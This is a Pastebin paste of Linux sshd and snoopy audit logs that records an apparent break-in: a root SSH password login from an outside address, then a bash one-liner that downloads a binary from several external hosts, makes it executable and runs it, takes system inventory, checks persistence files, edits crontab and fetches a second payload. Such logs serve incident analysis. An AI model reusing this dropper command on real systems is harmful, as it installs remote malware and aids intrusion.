Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Jun 20 12:52:56 localhost sshd[6768]: Accepted password for root from 175.126.82.235 port 65452 ssh2
- Jun 20 12:52:56 localhost sshd[6768]: pam_unix(sshd:session): session opened for user root by (uid=0)
- Jun 20 12:52:56 localhost sshd[6768]: subsystem request for sftp
- Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/bin/bash]: bash -c /usr/libexec/openssh/sftp-server
- Jun 20 12:52:56 localhost snoopy[6774]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
- Jun 20 12:52:56 localhost snoopy[6776]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
- Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/libexec/openssh/sftp-server]: /usr/libexec/openssh/sftp-server
- Jun 20 12:53:11 localhost snoopy[6777]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/bash]: bash -c rm -rf /var/run/sftp.pid;filename="/fuck";$filename || (filename="/6002.rar";cd /;pwd;path=$filename;rm -f $path* || /dev/null > $path;for list in `echo http://43.255.188.2/ http://103.20.195.254/ http://122.10.85.54/`;do (wget -O $filename $list$filename || curl -o $filename $list$filename) && break;done ; if [ -f $path ];then chmod +x $path;$path && echo ExecOK;fi);sleep 1;uname -a;cat /etc/issue;df -h;ps -ef|grep -v $$||ps aux|grep -v $$||ps x|grep -v $$;netstat -antop|grep -v 127.0.0.1||netstat -ano|grep -v 127.0.0.1||netstat -an|grep -v 127.0.0.1;echo ExecOK;cat /var/run/sftp.pid && echo InstallOK;cat /var/run/mount.pid && echo InstallOK;cat /var/run/gcc.pid && echo InstallOK; url=http://43.255.188.2/g.rar;(wget --connect-timeout=20 $url || curl--connect-timeout 20 -O $url) && chmod +x g.rar && ./g.rar
- Jun 20 12:53:11 localhost snoopy[6779]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
- Jun 20 12:53:11 localhost snoopy[6781]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
- Jun 20 12:53:11 localhost snoopy[6782]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/rm]: rm -rf /var/run/sftp.pid
- Jun 20 12:53:11 localhost snoopy[6783]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/fuck]: /fuck
- Jun 20 12:53:11 localhost snoopy[6785]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/sleep]: sleep 1
- Jun 20 12:53:11 localhost snoopy[6794]: [uid:0 sid:6788 tty:(none) cwd:/root filename:/bin/sed]: sed -i /\/etc\/cron.hourly\/gcc.sh/d /etc/crontab
- Jun 20 12:53:12 localhost snoopy[6813]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/uname]: uname -a
- Jun 20 12:53:12 localhost snoopy[6814]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /etc/issue
- Jun 20 12:53:12 localhost snoopy[6815]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/df]: df -h
- Jun 20 12:53:12 localhost snoopy[6817]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 6777
- Jun 20 12:53:12 localhost snoopy[6816]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/ps]: ps -ef
- Jun 20 12:53:12 localhost snoopy[6819]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 127.0.0.1
- Jun 20 12:53:12 localhost snoopy[6818]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/netstat]: netstat -antop
- Jun 20 12:53:12 localhost snoopy[6820]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/sftp.pid
- Jun 20 12:53:12 localhost snoopy[6821]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/mount.pid
- Jun 20 12:53:12 localhost snoopy[6822]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/gcc.pid
- Jun 20 12:53:12 localhost snoopy[6824]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/wget]: wget --connect-timeout=20 http://43.255.188.2/g.rar
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement